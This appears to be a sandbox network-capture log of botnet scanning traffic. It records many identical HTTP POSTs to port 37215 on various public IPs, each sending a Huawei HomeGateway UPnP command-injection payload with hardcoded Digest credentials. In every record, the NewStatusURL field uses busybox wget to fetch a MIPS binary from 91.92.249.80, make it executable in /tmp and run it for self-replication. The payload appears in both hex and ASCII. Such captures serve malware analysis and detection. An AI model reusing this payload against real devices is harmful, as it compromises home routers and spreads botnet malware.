                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1549192.168.2.2345192132.93.191.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.486296892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1550192.168.2.2342396157.3.22.6737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.486301899 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1551192.168.2.2345078197.192.102.9937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.486491919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1552192.168.2.2341058197.43.115.21437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.486505985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1553192.168.2.2337594197.244.54.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.486505985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1554192.168.2.2338804157.13.53.1837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.486720085 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1555192.168.2.2348388197.217.71.6937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.486749887 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1556192.168.2.2347150157.6.230.8937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.486804962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1557192.168.2.2346780197.234.237.17137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.486830950 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1558192.168.2.234557041.46.37.20237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.487366915 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1559192.168.2.2342618157.235.29.20237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.487366915 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
